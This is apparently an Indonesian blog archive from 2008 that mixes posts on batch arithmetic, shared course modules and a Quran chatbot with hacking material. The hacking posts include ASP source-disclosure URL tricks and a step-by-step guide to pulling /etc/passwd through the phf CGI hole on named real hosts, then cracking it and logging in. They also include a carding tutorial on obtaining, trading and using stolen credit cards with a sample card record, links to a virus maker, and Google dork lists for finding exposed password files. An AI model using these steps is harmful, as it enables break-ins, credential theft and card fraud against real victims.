Archive for June, 2008

hacking

Wednesday, June 11th, 2008

htttp://yogyacarding.tvheaven.com/download.htm HACKING.

Webhacking

1. IIS 4.0 IIshack Vulnerabillity
    dapat ditemukan di http://www.technotronic.com

2. Active Server Pages (ASP) Vulnerabillity
    1. (ASP DOT Bug Vulnerabillity) (kesalahan titik pada setiap akhir
         .ASP)
             
      di lihat di http://oliver.efri.hr/~crv/security/bugs/NT/asp.html
             
      vulnerabillity-nya dapat di ketahui dengan penambahan titik (.)        pada setiap akhir asp

             
      misal,  http://192.168.51.101/code/example.asp.

            
      namun dalam perkembangannya diperbaiki oleh Microsoft USA, dan         menimbulkan lagi 
Vulnerabillity baru yaitu:

               
http://192.168.51.101/code/example%2easp

               
      jadi menambahkan %2e (tanpa titik/disambung) dengan asp

      
   2. ASP Alternate Data Streams Vulnerabillity
         penambahan titik pada file.asp, yaitu

             
http://192.168.51.101/scripts/file.asp

             
      menjadi

             
      http://192.168.51.101/scripts/file.asp::$DATA

(sumber, Hacking Exposed)

Cara mendapatkan shell
gratis tanpa beli.

perlu beberapa bahan yaitu:
1. Web browser (minimal 3.0)
2. Program cracker (gunakan crackerjack atau starcracker)
3. daftar kata (wordlist/dictionary) - GlobalKOS KOSdict - 11.2 MB
4. KOmputer umum

step:
1. buka 2 window
2. window yang 1, dipakai untuk membuka www.altavista.com/sk,
dengan keywordnya, host:ac.il) jika menginginkan host2 dari israel,
host:co.jp, jika menginginkan yang dari jepang. trus liat hasilnya
3. window yang ke 2, digunakan untuk mencari pasw dari host2 yang didapat
pada window 1, caranya dengan memasukan :
http://nama.target.kamu/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd

misalnya

http://eris.wisdom.weizmann.ac.il/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd

4. hasilnya kemungkinan ada 4.
1. error..message…(kalo udah ginian, maka harus kembali lagi ke awal…)
2. smile, you’re on candid camera…( artinya, nomor ip kita direkam, dan
disimpan diserver si target)
3. muncul tulisan: root:*0:0:SystemAdministrator:/:/bin/cshsysadm:*:1:1:BokephMemendez:/usr/adm:/bin/bash.

perhatikan bahwa setelah tanda titik dua yang pertama, selalu muncul tanda
asteriks (*). ini artinya
kamu berhasil mendapatkan password hanya saja sayangnya sang fil sudah dishadow…harus
ada
akses ROOT, terpaksa harus ke target berikutnya…

4. muncul tulisan: root:OUK9b8RqMRVNs:0:0:root,,,,:/:/bin/cshsysadm:*:0:0:system
V administration:/usr/
admin:/bin/shdiag:*:0:996: HardwareDiagnostics:/usr/diags:/bin/csh
Leonid:F5AymuqmXVFCU:1399:8:Leonid
Bebek:/usr/leonid:/bin/tcsh
(dalam kasus ini: langsung bisa dapat file passwd asli! tanpa shadow!!!)

5. segera setelahn menndapat file Passwd didapatkan, "save as" dan simpan
ditempat yang aman, terserah boleh kalo mau lanjut ke target berikut atau segra

mengcrack. patikan kom,puter untuk ngecrack aman dan bisa dibiarkan menganggur

selama berjam-jam atau kalo file passwdnya memang besar, bisa berhari-hari.
6. jalankan program crack, gunakan wordlist atas file passwd yang baru dipanen
7. kalo sudah berhasil ngecrack, kamu sudah siap untuk memakai shell unix baru.
8. telnet ke servernya, jangan lupa….gunakan komp umum, kalo pribadi….di
phreak dulu.

(sumber, Anonymous)

virus

Wednesday, June 11th, 2008

Virus Maker Baru
by nol_kecil @ Monday, Oct. 15, 2007 - 21:48:01

temen temen masih pengen belajar tentang virus. berikut ini saya berikan program tambahan untuk membuat virus dan software lainnya yang sangat berguna bagi programer :
Jahilin Temen —>rar
Program kecil untuk iseng-iseng kerjaiin temen silahkan coba sendiri
Deepunfreez —zip
program kecil untuk membuka / menghack deefreze
Terabit virus maker.zip
program cara gampang membuat virus
Hackbiiling.zip
Program kecil untuk menghack billing explorer
Rampok v2.2.zip
Program kecil untuk mengembalikan regedit atau file yang terinfeksi virus
Antivirus_local.zip
Nah program yang satu ini berguna bagi yang pengen membuat antivirus sendiri. silahkan kembangkan sendiri ada source codenya juga loh…
n referensi berikut untuk download source codenya. :)))

Reff : http://free-mcafee-avg-update.blogspot.com/
Reff : http://oasisnet.wordpress.com/2007/08/

matematika

Wednesday, June 11th, 2008

Secret of Batch Programming - Operasi Matematika
by nol_kecil @ Saturday, Nov. 17, 2007 - 23:00:56

Yup ketemu lagi ama gw :) n artikel yang ini juga udah di uji coba oleh gw pribadi (walaupun hasil copy + paste) :) sebagai newbiez, semoga bermanfaat.

Tutorial ini berisi tentang cara melakukan operasi matematika, tentunya menggunakan bahasa CMD. Pada dasarnya operasi matematika ada 4, yaitu : penjumlahan (+), pengurangan (-), perkalian (*), dan pembagian (/)..dan ke-4 operasi tersebut bisa dilakukan oleh cmd.. Jadi dengan sedikit usaha sebenarnya kita bisa melakukan operasi matematika yang lebih komplex, seperti :

mengubah bilangan desimal ke biner, oktal atau Heksadesimal
Membuat fungsi Faktorial, segitiga Pascal, dsb.
Tapi, yang akan dijelaskan disini hanya dasarnya saja, untuk yang lebih komplex tunggu aja di tutorial Rahasia Batch Programming vol-2, itupun kalau tutorial ini disukai.
# Pembahasan

[1]. Operasi Dasar

Syntax : set /a [operasi]

Misalnya kita ingin menjumlakan 2+5

Syntax : set /a 2+5

Maka yang keluar adalah angka 7

Gimana kl pengurangan atau perkalian, ganti aja tanda “+” dengan “-”, “*”, atau “/”

Misal : 4 kali 5 = 20

Syntax : set /a 4*5

Selanjutnya, kalian coba sendiri aja yahh. Misal 2+3*0/20-100, kira2 berapa y hasilnya ??

~ Kelemahan : tidak bisa mengoperasikan angka berkoma, misalnya 2,3 + 2,1

~ Coba ketik di cmd : set /a 2,3+2,1

~ Maka yang keluar bukanya 4,4 tapi 1 “angka terakhir”

Sama halnya dengan pembagian yang menghasilkan koma, misal 3/2

Seharusnya hasilnya 1,5….tapi di cmd hanya ditulis 1 “pembulatan”

Kenapa begitu ??, gw jg kagak ngerti, udah dari Microsoft-nya kali…

Tapi jgn kawatir, banyak jalan menuju neraka..eh roma maksudnya..

Kita akan belajar cara membuat 2 angka di belakang koma, tapi ntar diujung acara, biar penasaran gitu.

Ok…langsung ke bab.2

[2]. Operasi menggunakan Variable

~ Untuk operasi yang ini lebih mudah jika menggunakan batchfile (*.bat)..tapi sebelumnya ada 4-hal yang harus dipahami dalam operasi menggunakan variabel…

~ Hal pertama : mendefinisikan variabel ..?!.zzz,’)

Ada yang belum tau caranya ??, kl blum iki caranya :

Syntax : set [nama_variabel]=[nilai]

Misal, mengeset variabel x dengan dengan nilai 10

Syntax : set x=10

Nb : $ nama varibel dapat menggunakan angka, huruf, maupun garis bawah “_”.

$ nilai variabel bisa berupa angka, huruf, simbol atau campuran…

~ Hal kedua : Memanggil variabel

Kalau yang tadi mendefinisikan, sekarang memanggil :

Syntax : %nama_variabel%

Contoh : %x%

Untuk menampilkan di command prompt ketik : echo %x%

Jadi, kalau tadi nilai x=10 , maka yang muncul di command prompt adalah 10.

~ Hal ketiga : menghapus variabel

Syntax : set “nama_variabel=”

Misal : set “x=” , maka variabel x akan terhapus (undefined).

~ Hal keempat : Input from User

Maksudnya, memberi nilai thd sebuah variabel berdasarkan input dari user (mirip scanf di C++)..

Syntax : set /p nama_var=[kata_anjuran/pertanyaan]

Contoh : set /p x=Tentukan Nilai x :

Artinya, nilai variabel x bukan “Tentukan Nilai x :” tetapi hasil input dari user…

Nah, kalau dah paham ke-4nya langsung aja kita buat contoh Batchfile-nya.

::——————————————————

@echo off

Title Contoh Operasi Penjumlahan Sederhana

echo Operasi C=A+B

set /p A=tentukan nilai A :

set /p B=tentukan nilai B :

set /a C=A+B

echo Nilai C=%C%

pause >nul

::——————————————————

Ketik/copy paste di notepad, truz save dgn extensi “.bat”

Contoh : Jumlah.bat

Gampang kan !!!..sekarang kita coba melakukan grouping “()”:

Masih ingat waktu SD dulu diajarin prioritas operasi matematika:

Misal : 2+3*5=17

Jadi, kalau kita ingin menyelesaikan 2+3 dulu maka diberi tanda kurung : (2+3)*5=25

Sama halnya di cmd, operasi bisa diberi tanda kurung, untuk mendahulukan perhitungan..

Kita langsung coba aja yuk biar ngerti :

::——————————————————

@echo off

Title Contoh Operasi Grouping

set A=2

set B=3

set C=4

set D=5

echo A=%A%,B=%B%,C=%C%,D=%D%

echo operasi = (A+B)*(C-D)

set /a Hasil=(A+B)*(C-D)

echo Hasil=%Hasil%

pause >nul

::——————————————————

Jika sukses akan menghasilkan Total=-5

# Tips & Trik

[1]. Mengacak Nilai/Random

Syntax : [ echo %random% ] atau [ set /a %random% ]

~ untuk mengacak angka dari 0-10

Syntax : set /a %random

11

            “%random

11” kok bisa ya menghasilkan angka random dari 1-10 ??? bingung ??

Ni penjelasannya :

~ ada 1 lagi operasi yang bisa dilakukan cmd, yaitu : menghitung sisa pembagian..

~ misal 10/3=3 sisa 1 , jadi kalau di cmd ingin menghitung sisanya ketik aja :

syntax : set /a 10%3

~ jadi misal angka random tsb = 21, maka “random%11”=10, 10 adalah sisa pembagian

maximumnya, soalnya g mungkin sisa pembagian=nilai pembagi ..bener gak ?

Apa mungkin “sesuatu/11=…, sisa=11” ?? pasti maximalnya=11-1=10…..

[2]. Membuat 2 angka dibelakang koma untuk Operasi Pembagian

seperti janji saya di awal kita akan belajar membuat 2 angka dibelakang koma :

::———————————————————————

@echo off

mode 40,15

:start

cls

set “a=”

set “b=”

set “k1=”

set “k2=”

echo Trik Membuat 2 angka dibelakang koma.

echo.

echo Operasi = A / B

setlocal

set /p a=Tentukan nilai A :

set /p b=Tentukan nilai B :

set /A x=a/b

set /a k1=(a-x*b)*10/b

set /a k2=((a-x*b)*10-(k1*b))*10/b

if errorlevel 1 goto start

if /i %k1% lss 0 set /a k1=0-k1

if /i %k2% lss 0 set /a k2=0-k2

:next

echo.

echo Hasil Pembagian = %x%,%k1%%k2%

:con_loop

set “ans=”

set /p ans=Continue (y/n)?

if /i “%ans%” equ “y” goto start

if /i “%ans%” equ “n” exit

goto con_loop

::———————————————————————

seperti biasa, save : bagi.bat , truz jalanin….

misal : 10/6 , isi A=10 B=6, truz enter ……jreng keluar deh hasilnya : 1,66

asyik khan….

# Bonus : Membuat Program seperti Kalkulator

program kecil2an dari gw, moga bermamfaat :

::———————————————————————

@echo off

mode 47,15

Title Simple Batch Calculator

color 79

:start

cls

::Clear variable

set “op=”

set “result=”

echo +============================================+

echo ^| Contoh Kalkulator Sederhana Sekali ^|

echo +============================================+

echo.

echo ———————————————-

echo ^|

echo ———————————————-

set /p op=Operasi :

set /a result=%op%

:result

cls

echo +============================================+

echo ^| Contoh Kalkulator Sederhana Sekali ^|

echo +============================================+

echo Result :

echo ———————————————-

echo ^| %op% = %result%

echo ———————————————-

set “ans=”

set /p ans=Continue (y/n)?

if /i “%ans%” equ “y” goto start

if /i “%ans%” equ “n” exit

goto result

::———————————————————————

save dgn ext bat..contoh : kalkulator.bat

cra pakainya tinggal ketik aja yang mau diitung, misal “2+5-6*3”

silahkan berkreasi/mengembangkannya…ok

::———————————————————————

end_main;

}

akhir kata()

{

Fuuhhh, akhirnya kelar jg artikelnya, cp dehhh….

oiya, kl mau kirim saran, kritik, or apa saja kirim aja ke dalam hati masing2 ya….

:)…:)…,’)..^_*

Salam/Regard

Fen_Li

`still newbie kid`

}

/* sekedar polling sms : Kalau suka dengan artikel ini

ada yang mau kasih saran/ide : Tema untuk Secret of B# (Batch Programming) vol.2

kira2 tema yang bagus apaan yah ??

ayo request !!!

misal : ~ membuat animasi

~ atau mungkin program chat pake netsend ??

~ or kill vb (visual basic killer)

atau ide lain ? Silahkan beri komentar …… */

getchar(); // bobo dulu y….dah malem..bsk lanjutin lagi…ocre

end; // PAGI : eh..ternyata dah selesai, lanjutin lagi ah bobonya….zzzzzzzzzzz
2 comments | Trackback (0) | Permalink | Recommend this post
Tags: news,
« Ubuntu 7.10 Gutsy Gibbon!
Hacking Modem Speedy »

Disable ads

Trackback address for this post:
Enter this code to show trackback-url:
authimage
Comments, Trackbacks: Hide subcomments
VeNoL [Visitor]

12/12/07 @ 13:47

boz !!!

bisa lanjutin learning batch programming nya ga ????

bagus neeh tutorial dari mas fen_li neeeh
bagi lagi ya boz !!

tutorialnya !!!!

cad

Wednesday, June 11th, 2008

Bobol Kartu Kredit Aug 28, ‘07 4:03 PM
for everyone
Carding, sebuah ungkapan mengenai aktivitas berbelanja dengan menggunakan alat pembayaran yang tidak sah yang pada umumnya menggunakan kartu kredit milik orang lain.

Transaksi berlangsung ketika toko atau perusahaan yang menyediakan merchant pembayaran mengizinkan adanya transaksi tersebut dan carder tinggal menyetujui dengan cara bagaimana pembayaran tersebut di lakukan apakah dengan kartu kredit, wire transfer, phone bil atau lain sebagainya.

Umumnya carding dilakukan sebagai berikut:

1. Mencari kartu kredit yang masih valid, hal ini dilakukan dengan mencuri atau kerjasama dengan orang-orang yang bekerja pada hotel atau toko-toko gede (biasanya kartu kredit orang asing yang disikat). atau masuk ke program MIRC (chatting) pada server dal net, kemudian ke channel #CC, #Carding, #indocarder, #Yogyacarding,dll. kemudian kita dapat melakukan trade (tukar menukar kartu kredit curian). Jika tidak punya kartu kredit, maka dapat melakukan aktivitas “ripper” dengan menipu salah seorang yang memiliki kartu kredit yang masih valid.

2. Setelah berhasil mendapatkan kartu kredit, maka carder dapat mencari situs-situs yang menjual produk-produk tertentu (biasanya di cari pada search engine). Biasanya setelah mencoba terlebih dahulu (verify) kartu kredit tersebut di site-site porno (hal ini disebabkan karena kartu kredit tersebut tidak hanya dipakai oleh carder tersebut). Jika di terima, maka kartu kredit tersebut dapat di belanjakan ke toko-toko tersebut.

3. Cara memasukan informasi kartu kredit pada merchant pembayaran toko adalah dengan memasukan nama panggilan (nick name), atau nama palsu dari si carder, dan alamat aslinya. atau dengan mengisi alamat asli dan nama asli si empunya kartu kredit pada form billing dan alamat si carder pada shipping adress. (mudahkan?…..)

Jenis kartu kredit:

1. Asli didapatkan dari toko atau hotel (biasa disebut virgin CC)

2. Hasil trade pada channel carding

3. Hasil ekstrapolet (penggandaan, dengan menggunakan program C-master 4, cardpro, cardwizard, dll), softwarenya dapat di Download disini: Cmaster4, dan cchecker (jika ada yang ingin mengetahui CVV dari kartu tersebut)

4. Hasil hack (biasa disebut dengan fresh cc), dengan menggunakan teknik jebol ASP

Contoh data kartu kredit:

First Name* Mamas
Last Name* Eko
Address* Jl. Jend. Sudirman 122
City* Cilacap
State/Province* Central Java
Zip* 53261
Phone* ( 62 )852-27303-999
E-mail* mamaz_eko999@yahoo.com
Payment Method Visa
Card Number 4046446034843451
Exp. Date 5/08

Tapi ingat, kegiatan semacam ini merupakan tindakan kriminalitas. Jadi cukup buat dimengerti saja ya, jangan dipraktekan. Kasihan si korban…

bug

Wednesday, June 11th, 2008

http://whandi.wordpress.com/2007/03/11/daftar-bugs/

mujarab

Wednesday, June 4th, 2008

Rabu, 2007 November 28

Modul C++, bagi anda yang mau

Di kelas saya (1F), Mr. Popong tidak memberikan modul untuk bisa
kami pelajari. Cari punya cari, ke Paman Google dan ke teman-2 laen…
eh.. dapet deh. Akhirnya dengan sengaja saya share Modul C++ ini buat
teman-2 semua.

Silahkan di unduh aja!

Tipe data dan operasi IO, C++
Keputusan & Perulangan, C++
Fungsi, C++
Array, C++
Pointer, C++

Modul Pemrograman Java ke-2

Saya memang sengaja men-share modul ini. Khususnya bagi teman-teman
ku mahasiswa MJC D3-TKJ Batch 2 Semester 1. Silakan di download aja.

Modul 1 Java2
Modul 2 Java2
Modul 3 Java2
Modul 4 Java2
Modul 5 Java2
Modul 6 Java2
Modul 7 Java2
Modul 8 Java2
Modul 9 Java2
Modul 10 Java2
Modul 11 Java2
Modul 12 Java2
Modul 13 Java2

Jumat, 2007 November 16

Tips dan Trik menggunakan Search Engine Google

Tulisan ini saya ambil dari : http://ariebhewhe.wordpress.com dan juga dari  http://nothandsomehero.wordpress.com/
Saya
mengucapkan terima kasih sebanyak-banyaknya atas tulisan yang sangat
bermanfaat ini. Oleh karena itu saya meng-copy/paste-nya di blog saya,
dengan tujuan sama-sama menyebarkan ilmu yang bermanfaat.

 

Intitle:
ialah sintaks perintah untuk membatasi pencarian yang hanya
menghasilkan judul yang mengandung informasi pada topik yang dimaksud.
Sebagai contoh pada pencarian, “intitle:
password admin” ( tanpa
tanda kutip ). Pencarian akan mencari page yang mengandung kata
”password” sebagai judulnya dengan prioritas utama “admin” .
Jika
pada pencarian terdapat dua query pencarian utama, digunakan sintaks
allintitle: untuk pencarian secara lengkap. Sebagai contoh pada
pencarian “allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua
subjek utama judul yaitu “admin” dan “mdb”.

 

inurl:
ialah sintaks perintah untuk membatasi pencarian yang hanya
menghasilkan semua URL yang hanya berisi kata kunci informasi yang
dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl : database
mdb”. Pencarian akan menghasilkan semua URL yang hanya mengandung
informasi tentang “database mdb “.
Hal yang sama juga berlaku pada
sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks
“allinurl:” untuk mendapatkan list url tersebut.
Sebagai contoh
pencarian “allinurl: etc/passwd” , pencarian akan menghasilkan URL yang
mengandung informasi tentang “etc” dan “passwd”. Tanda garis miring
slash (”/”) diantara dua kata etc dan passwd akan diabaikan oleh mesin
pencari Google.

 

site:
ialah sintaks perintah untuk membatasi pencarian suatu query informasi
berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada
pencarian informasi: “waveguide site:itb.ac.id” (tanpa tanda kutip).
Pencarian akan mencari topic tentang waveguide pada semua halaman yang
tersedia pada domain itb.ac.id.

   

cache:” akan menunjukkan daftar web yang telah masuk kedalam indeks database Google. Sebagai contoh:
“cache:deffcon.org”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page deffcon.org

 

filetype:
ialah sintaks perintah pada Google untuk pencarian data pada internet
dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh
pada pencarian : “filetype:doc site:go.id confidental” ( tanpa tanda
kutip). Pencarian akan menghasilkan file data dengan ekstensi “.doc”
pada semua domain go.id yang berisi informasi “confidential”.

 

link:
ialah sintaks perintah pada Google yang akan menunjukkan daftar list
webpages yang memiliki link pada webpage special. Sebagai
contoh:”link:www.securityfocus.com” akan menunjuukan daftar webpage
yang memiliki point link pada page SecurityFocus.

 

related:” sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan.
Sebagai
contoh: “related:www.securityfocus.com”, pencarian akan memberi daftar
web page yang serupa dengan homepage Securityfocus.

 

intext:
sintaks perintah ini akan mencari kata kata pada website tertentu.
Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai
contoh :
“intext:admin” (tanpa tanda petik), pencarian akan
menghasilkan link pada web page yang memiliki keyword yang memiliki
keyword admin.

 

Beberapa query sintaks diatas akan sangat membantu dalam pencarian data dan informasi lebih detail.
Google
dapat menjadi mesin pencari untuk menggali informasi tertentu dan
rahasia, informasi yang tidak diperkirakan yang dapat memberitahukan
sisi lemah suatu sistem. Hal tersebut yang dimanfaatkan oleh sebagian
individu untuk melakukan penetrasi suatu server atau sistem informasi .

 

Sintaks “Index of ” dapat digunakan untuk mendapatkan situs yang menampilkan indeks browsing direktori.
Webserver
dengan indeks browsing yang dapat diakses, berarti siapa saja dapat
melakukan akses pada direktori webserver, seperti layaknya dapat
dilakukan pada lokal direktori pada umumnya.
Pada kesempatan ini
dipaparkan bagaimana penggunaan sintaks “index of” untuk mendapatkan
hubungan pada webserver dengan direktori indeks browsing yang dapat
diakses.. Hal tersebut merupakan sumber informasi yang sederhana dapat
diperoleh, akan tetapi isi dari informasi seringkali merupakan
informasi yang sangat penting. Informasi tersebut dapat saja berupa
password akses atau data transaksi online dan hal yang sangat penting
lainnya.
Dibawah ini merupakan beberapa contoh penggunaan sintaks ”
indeks of” untuk mendapatkan informasi yang penting dan sensitive
sifatnya.
ex :
Index of /admin
Index of /passwd
Index of /password
Index of /mail
“Index of /” +passwd
“Index of /” +password.txt
“Index of /” +.htaccess
“Index of /secret”
“Index of /confidential”
“Index of /root”
“Index of /cgi-bin”
“Index of /credit-card”
“Index of /logs”
“Index of /config”
“Index of/admin.asp
“Index of/login.asp

 

Mencari sistem atau server yang vulnerable menggunakan sintaks “inurl:” atau “allinurl:”

 

  1. Menggunakan
    sintaks “allinurl:winnt/system32/” (dengan tanda petik ) akan
    menampilkan daftar semua link pada server yang memberikan akses pada
    direktori yang terlarang seperti “system32″. Terkadang akan didapat
    akses pada cmd.exe pada direktori “system32″ yang memungkinkan
    seseorang untuk mengambil alih kendali sistem pada server tersebut.
  2. Menggunakan
    “allinurl:wwwboard/passwd.txt” ( dengan tanda petik ) akan menampilkan
    daftar semua link pada server yang memiliki kelemahan pada “wwwboard
    Password”. Pembahasan lebih lanjut tentang vulnerability “wwwboard
    Password” dapat dilihat pada site keamanan jaringan seperti
    http://www.securityfocus.com atau http://www.securitytracker.com
  3. Menggunakan
    sintaks “inurl: bash history” (dengan tanda petik ) akan menampilkan
    daftar link pada server yang memberikan akses pada file “bash history”
    melalui web. File tersebut merupakan command history file yang
    mengandung daftar perintah yang dieksekusi oleh administrator, yang
    terkadang menyangkut informasi sensitive seperti password sistem.
    Seringkali password pada sistem telah dienkripsi, untuk mendapatkan
    password aslinya bentuk yang dienkripsi ini harus didekripsi
    menggunakan program password cracker. Lama waktu untuk mendapatkan
    hasil dekripsi tergantung dari keandalan program dan banyaknya karakter
    yang terenkripsi.
  4. Menggunakan “inurl:config.txt”
    (dengan tanda petik) akan menampilkan daftar semua link pada server
    yang memberikan akses pada file “config.txt. File ini berisi informasi
    penting termasuk hash value dari password administrator dan proses
    autentifikasi dari suatu database.

       

Sintaks “inurl:” atau “allinurl:” dapat dikombinasikan dengan sintaks yang lainnya seperti pada daftar dibawah ini :

  Inurl: /cgi-bin/cart32.exe
inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:”wwwroot/*.”
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php
inurl:gov filetype:xls “restricted”
index of ftp +.mdb allinurl:/cgi-bin/ +mailto allinurl:/scripts/cart32.exe allinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php
allinurl:/privmsg.php
allinurl:/privmsg.php
inurl:cgi-bin/go.cgi?go=*
allinurl:.cgi?page=*.txt
allinurul:/modules/My_eGallery
Mencari suatu sistem atau server yang memiliki kelemahan dengan sintaks “intitle:”
atau “allintitle:”

Rabu, 2007 September 26

Bagi-bagi Modul KKPI

Semua mahasiswa MJC Semester 1 yang belum memiliki modul KKPI ini
saya buatkan link untuk bisa langsung di download. Monggooooo…..

Minggu, 2007 September 23

Aplikasi untuk Java Editor

Terus bagi kalian yang belum punya aplikasi Java Editor boleh klik ini JGel dan Jcreator. Selamat mencoba ya. Ayo belajar bahasa Jawa eehh.. . Java.. :))

Jumat, 2007 September 21

Materi CCNA 1 & Java Programming

Bagi teman-teman mahasiswa MJC Semester 1, yang mau modul CCNA 1 dari Pak Yamta monggo diunduh di sini.

–> Modul ke-1 CCNA
–> Modul ke-2 CCNA
–> Modul ke-3 CCNA
–> Modul ke-4 CCNA
–> Modul ke-5 CCNA
–> Modul ke-6 CCNA
–> Modul ke-7 CCNA
–> Modul ke-8 CCNA
–> Modul ke-9 CCNA
–> Modul ke-10 CCNA
–> Modul ke-11 CCNA

Kalo yang ini dari Pak Hariyady, Java Programming, Mau… klik aja…!
–> Modul 1 Java
–> Modul 2 Java
–> Modul 3 Java
–> Modul 4 Java
–> Modul 5 Java
–> Modul 6 Java
–> Modul 7 Java
–> Modul 8 Java
–> Modul 9 Java
–> Modul 10 Java
–> Modul 11 Java
–> Modul 12 Java

Minggu, 2007 September 02

Quran Di Yahoo Messenger

Ingin baca Al Quran melalui Yahoo Messenger? Chat aja dengan user quran.noble.

Alternatif lain adalah :
Yahoo Messenger: Quran.Noor, Quran.Noble

Saya
sudah coba berinteraksi dengan Quran.Noble dan Quran.Noor di Yahoo
Messenger saya, dan hasilnya cukup memuaskan. Bukan saja ayat suci Al
Quran, dengan bot ini kita juga bisa mencari tahu tentang hadits.

Cara
menggunakannya adalah, Anda tambahkan salah satu user yang sesuai ke
buddy list Anda, misal jika Anda pengguna Yahoo Messenger, bisa
menambahkan Quran.Noor. Kemudian buka jendela chat dan mulai lah
berinteraksi….

Format penulisannya adalah: quran[spasi]bahasa[spasi]nomor surat[:]nomor ayat.
Semisal jika Anda ingin mengetahui terjemahan dari surat Al Fatihah ayat 1-3, cukup ketik:

quran id 1:1-3

Atau
jika Anda tidak ingat nomor suratnya, bisa juga dengan mengetikkan
namanya, misalnya untuk mengetahui terjemahan surat Al Ikhlas ayat 2
bisa mengetikkan :

quran id al-iklas:2

Catatan disini
bahwa bot ini cukup pintar untuk mengkoreksi nama surat yang kita
ketikkan, semisal saat saya memasukkan nama surat al iklas, bot lgsg
mengartikan dengan surat Al Ikhlas

Selain itu saya juga mencoba
berinteraksi dengan bot melalui GTalk(Quran.Noble@gmail.com) dengan
mengetik help, namun didapat pesan :

quran.noble@gmail.com is offline and can’t receive messages right now.

Info ini awalnya saya dapat dari blog B4N9-S

Sumber: http://quran.noble.googlepages.com/

———————————————————————————–
Ternyata di YM ada Al Quran :)

ternyata di YM ada menu alQuran…. lebih tepatnya chat dg al-Quran…

bgmn caranya?

ikuti cara berikut:
1. Klik ikon untuk menambah kontak YM anda{add a contact}, kemudian pada kolom yang
disediakan ketik “quran.noble” . Selanjutnya anda tinggal ikuti
petunjuk lainnya seperti biasa.

2. Untuk dapat kotak dengannya kirim pesan

:

Contoh : Untuk mengetahui terjemahan Al Fathihah ayat 1 sampai ayat 3
tinggal ketik di kolom pesan sbb: quran id 1:1-3

Anda orang Jerman, tidak mengerti bahasa indonesia; ketik saja de
(maksudnya bukan id seperti di atas); untuk english ketik en, etc.

Mudah
bukan..? Semoga dengan ini kita semakin mudah untuk mendekatkan diri
kepada Allah dan semakin mengerti akan kandungan firman-Nya.

di sadur dari blognya Fadliwae dan firabliz

Rabu, 2007 Juli 18

Sertifikasi TOEIC dan KKPI

Sertifikasi TOEIC
adalah pengalaman pertama bagi saya. Ya… yang pertama. Kaget, karena
jumlah soalnya "wiiiuuuh…" bejibun bok. 100 nomor soal listening dan
100 soal reading. Dikerjakan dalam waktu 2 jam saja. Nah, lo.
Mmmm…
namanya pengalaman pertama. Tentu saja bagi saya pribadi adalah suatu
tantangan untuk segera dapat menyelesaikan soal-2 tersebut. Mentornya
bilang "Lebih baik anda tidak perlu
melihat kepada pekerjaan teman yang lain karena menurut saya justru hal
itu nanti menjadi penghambat dalam proses pengerjaan, karena jeda waktu
pengerjaannya antara satu nomor dengan nomor yang lain adalah cuma 12
detik. Jadi sebaiknya Anda tidak perlu saling tengok sana tengok sini,
karena hal itu percuma. Karena belum tentu jawaban teman Anda itu juga
benar
".

Dalam hati saya…. wow…. 12 detik bok…. Mau tidak mau tetap harus dihadapi dan dikerjakan.
Listening
Sangat berbeda dengan apa yang pernah saya alami di sekolah (SMK), yang berbicara adalah benar-2 native speaker,
jadi saya kadang-2 kurang jelas dengan apa yang diucapkan. Beda sekali
dengan kalo di SMK, yang berbicara adalah seorang Indonesia asli,
karena yang membuat adalah pihak Diknas Jakarta.
Reading
Bacaan
yang ada di lembar soal memang luar biasa. Yang harus dibaca banyak,
ada memo, pamflet, pengumuman, pemberitahuan, fax, potongan koran,
artikel dan lain-2. Jadi peserta DIPAKSA untuk bisa memahami dengan cepat dengan metode membaca cepat. …wiuh…
Akhirnya,
selesai juga kok. Tapi ada rasa capek yang hampir semua peserta rasakan
adalah leher jadi capek karena menunduk terus…. :D

Sertifikasi KKPI,
kalo yang satu ini saya sudah pernah pengalaman dengan mengikuti
Assesor KKPI tahun 2005 lalu di VEDC Malang juga, bersama dengan
teman-2 dari daerah lain seperti Palangkaraya, Biak, Bukittingi, Palu
dan lain-2. Saya waktu itu ada di Angkatan ke-14.
Karena saya sendiri juga mengajar KKPI di SMK, jadi secara gak langsung saya sudah paham benar dengan soal-2 yang disajikan.
Tapi
ada beberapa kendala yang saya jumpai sewaktu sertifikasi KKPI kali
ini. Teman-2 lain yang berangkat dari tingkat SD dan SMP sama sekali
tidak mengenal dengan yang namanya "KKPI". Mereka berkata "Lha, gak
pernah dikasih materi kok tiba-2 di tes KKPI, ya mesti saja gak bisa".
Menurut
saya, apa yang mereka ucapkan juga gak salah. Karena mereka memang
tidak pernah mengenal dengan yang namanya KKPI. Jadi wajar kalo ada
beberapa yang nilai jeblok.
Atau bahkan ada yang gak lulus karena nilainya tidak memenuhi syarat.
Nilai yang diminta adalah minimal 70 per Modul KKPI, dan ada 9 Modul
KKPI termasukk 1 Ujian Akhir.

Ok, lah teman-2 seperjuangan D3
TKJ Batch 2. Saya hanya berharap semoga kita tetap bisa kuliah
bareng-bareng di MJC meskipun belum ada yang lulus KKPI tapi kan mungkin masih bisa diperbaiki dengan diberikannya kesempatan pada beberapa bulan yang akan datang setelah kita kuliah.

bobol

Monday, June 2nd, 2008

Tip Dan Triks Google

Submitted by Kiagus on February 13, 2008

Category: Miscellaneous

Words: 275 | Pages: 2

Views: 71

Popularity Rank: 90,886

Average Member Grade: N/A (Add a Comment / Grade this Paper)

Tip dan Triks Google

Pencarian google cepat ?intitle:index.of? ppt anesthesia

Sintaks �Index of � seringkali digunakan untuk mendapatkan file-file
dalam direktori tertentu, di mana seringkali file-file tersebut adalah
file yang urgen dan penting. Buat mereka yang hobi donlod sesuatu
(misalnya e-book atau mp-3), cukup ketikkan :


�Index of� �parent directory� �file_yang_dicari� �filetype:jenis_file_itu�

